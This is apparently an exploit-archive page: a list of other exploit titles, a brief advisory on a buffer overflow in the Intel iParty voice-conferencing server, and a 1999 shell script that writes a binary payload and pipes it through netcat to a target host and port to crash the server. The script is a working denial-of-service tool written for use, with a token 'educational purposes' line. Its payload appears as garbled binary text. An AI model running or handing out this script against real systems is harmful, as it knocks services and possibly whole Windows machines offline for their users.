
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
47 lines
No EOL
2.2 KiB
Bash
Executable file
47 lines
No EOL
2.2 KiB
Bash
Executable file
source: https://www.securityfocus.com/bid/6844/info
|
||
|
||
A buffer overflow condition has been discovered in the Intel iParty server.
|
||
|
||
It is possible to trigger a denial of service by submitting an excessive number of characters to the network port used by the iParty server. The server will need to be restarted to regain normal functionality.
|
||
|
||
This issue may be due to a buffer overrun, potentially resulting in arbitrary code execution. This possibility has not been confirmed.
|
||
|
||
#!/bin/sh
|
||
# iParty Pooper by Ka-wh00t (wh00t@iname.com) - early May '99 - Created out of pure boredom.
|
||
# iParty is a cute little voice conferencing program still widely used (much to my surprise.)
|
||
# Unfortuneately, the daemon, that's included in the iParty download, can be shut down remotely.
|
||
# And in some circumstances, this can lead to other Windows screw-ups (incidents included internet
|
||
# disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other
|
||
times
|
||
# a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest
|
||
# (only?) version of iParty/iPartyd was v1.2
|
||
# FOR EDUCATIONAL PURPOSES ONLY.
|
||
|
||
|
||
if [ "$1" = "" ]; then
|
||
echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)"
|
||
echo "In some circumstances can also crash other Windows progs and maybe even Windows itself."
|
||
echo "Maybe you'll get lucky."
|
||
echo ""
|
||
echo "Usage: $0 <hostname/ip> <port>"
|
||
echo "Port is probably 6004 (default port)."
|
||
echo ""
|
||
echo "Remember: You need netcat for this program to work."
|
||
echo "If you see something similar to 'nc: command not found', get netcat."
|
||
else
|
||
if [ "$2" = "" ]; then
|
||
echo "I said the port is probably 6004, try that."
|
||
exit
|
||
else
|
||
rm -f ipp00p
|
||
cat > ipp00p << _EOF_
|
||
$6ì]}tTÕµ?"Ìa?p/?HÔD?0iAáœL%ÏÌ?EBEÔð'*}ÒyÓÔ¥(3êz?nÃuèÔj+š°(Ö?Ö?d'??øZiXåËy7¡'``àŸœÏ Cµ¶ïüÖʹçî³ÏÞçìœÏ>çÜE¢6?â^ßî^v¯?ì^¯:ÂÆ{n"uí£Ç'g=oš§?8ÂÓ'L5"ïé²±?သDRGÒIôlq?Yg?»Òi?ÆiÕŸëH¹H?w?òᜲ»Ô3ðl??*oÎ#ésC9m,
|
||
|
||
_EOF_
|
||
echo ""
|
||
echo "Sending kill..."
|
||
cat ipp00p | nc $1 $2
|
||
echo "Done."
|
||
rm -f ipp00p
|
||
fi
|
||
fi |